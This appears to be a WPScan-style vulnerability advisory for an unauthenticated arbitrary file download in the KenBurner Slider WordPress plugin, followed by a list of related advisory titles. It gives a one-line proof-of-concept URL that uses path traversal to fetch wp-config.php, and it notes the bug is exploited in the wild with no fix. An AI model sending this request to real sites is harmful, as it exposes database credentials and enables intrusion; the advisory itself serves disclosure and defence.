KenBurner Slider – Unauthenticated Arbitrary File Download

Description

The WordPress Plugin called KenBurner Slider suffers from Arbitrary File Download Vulnerability, which could allow an attacker to download the wp-config.php file and others.

This issue has been spotted being exploited in the wild.

Proof of Concept

http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php

Affects Plugins

kbslider

No known fix

References

URL

https://packetstormsecurity.com/files/#127987/

URL

https://twitter.com/Random_Robbie/status/1230173738827702272

Classification

Type

LFI

OWASP top 10

A1: Injection

CWE

CWE-22

Miscellaneous

Verified

WPVDB ID

4f7b740d-ce5e-4d3d-bb34-b938df09f4eb

Timeline

Publicly Published

2014-08-24 (about 11 years ago)

Added

2020-02-20 (about 6 years ago)

Last Updated

2020-02-21 (about 6 years ago)

Other

Published

Title

Published

2024-12-03

Title

Classic Addons – WPBakery Page Builder < 3.1 - Authenticated (Contributor+) Limited Local PHP File Inclusion

Published

2025-10-24

Title

Directorist: AI-Powered Business Directory Plugin with Classified Ads Listings < 8.4.9 - Authenticated (Subscriber+) Arbitrary File Move

Published

2014-08-01

Title

Ajax Pagination 1.1 - wp-admin/admin-ajax.php loop Parameter Local File Inclusion

Published

2025-12-11

Title

WP Job Portal < 2.4.1 - Authenticated (Subscriber+) Arbitrary File Read

Published

2026-04-21

Title

Breaking News WP <= 1.3 - Missing Authorization to Authenticated (Subscriber+) Local File Inclusion/Read